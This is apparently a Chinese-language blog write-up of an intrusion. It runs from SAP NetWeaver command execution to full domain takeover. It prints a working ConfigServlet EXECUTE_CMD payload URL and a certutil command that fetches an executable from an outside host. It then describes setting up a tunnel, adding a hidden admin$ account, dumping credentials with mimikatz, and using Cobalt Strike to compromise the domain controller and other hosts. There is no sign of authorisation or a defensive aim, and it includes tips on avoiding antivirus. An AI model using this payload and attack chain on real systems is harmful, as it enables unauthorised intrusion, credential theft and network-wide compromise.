记一次命令执行到内网渗透拿下域控

文章来源：潇湘信安

原文链接：

https://www.xljtj.com/archives/ad.html

目标站采用SAP NetWeaver是SAP的集成平台，SAP命令执行payload为网址+命令。

Windows执行：

http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd /c net user

Linux执行：

http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id

由于提前得知目标为Windows机器，直接在目标网站执行net user，得到如下结果

查看当前用户，权限以及网络信息

得到当前用户sapxxx为administrator权限，同时为内网机器，那么就可以直接执行Windows自带的下载命令，来下载一个狗洞，用来转发流量。

当然你可以直接执行比如CS、MSF、以及你自己的远控等等，但是要考虑免杀问题，就用狗洞来操作。

Windows下载命令：

certutil-urlcache -split -f http://8.8.8.8/test.exe C:\test.exe

下载好之后，首先要用狗洞服务端在你自己外网服务器打开一个监听功能，目标机器执行上线命令，然后等待上线

成功上线后，自己电脑连接狗洞，出现此提示为连接成功，之后用代理软件，比如Proxifier或者Sockscap等工具代理本机127.0.0.1 8088端口

然后用命令执行去添加一个管理权限的用户，根据上面ipconfig得到的内网ip：10.85.x.x，直接连接其3389，成功添加账号admin$，直接登陆成功

在这里友情提示下，内网中存在域时，登陆账号要选择当前域计算机用户去登陆，不然会登陆不上

执行查询域管机命令发现没权限，然后用猕猴桃抓取一下本机账号密码，

使用administxxx账号，ATxxx域去登陆，查询域管机与域管用户

巧了不是，直接用得到的ATxxx\Administxxx去登陆SRV-DC-xx或者SRV-MAIN-xx，ping SRV-DC-xx和SRV-MAIN-xx得到ip

登录后

既然内网机器并无杀软，那么尝试上一个cs批量上线吧，搭建好cs服务端，直接生成文件在域控机上执行，等待机器上线后，右键执行猕猴桃，或者转储hash，让他自动获取密码

然后执行net view或者arp -a来获取目标ip

然后到目标处随便框选几台机器，当然你也可以全部选择，右键，登陆

然后选择你刚才搞出来的账号密码，选择一个监听器，坐等机器上线即可

最后给各位大佬比心，PS: 有指教请您留言